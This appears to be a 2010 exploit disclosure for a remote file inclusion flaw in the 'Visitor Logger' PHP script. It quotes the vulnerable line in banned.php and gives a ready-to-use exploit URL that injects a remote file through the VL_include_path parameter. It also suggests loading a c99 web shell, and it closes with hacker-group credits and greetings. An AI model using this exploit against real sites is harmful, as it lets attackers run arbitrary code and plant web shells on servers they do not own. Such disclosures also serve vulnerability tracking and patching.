#-> Visitor Logger (banned.php) Remote File Include Vulnerability
#-> Date: 2010/05/31
#-> Vendor: http://www.graviton-mediatech.com
#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip
#-> Googledork: n/a
#-> Discovered by bd0rk
#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com
#-> Website: www.soh-crew.it.tt
#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)
Description 1: Look in file banned.php line three to four and you can see this
if (file_exists($VL_include_path."/banned.txt")) {
[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]
--> An attacker can use c99-shellcode, for example.
#### The 21 years old, german Hacker bd0rk ####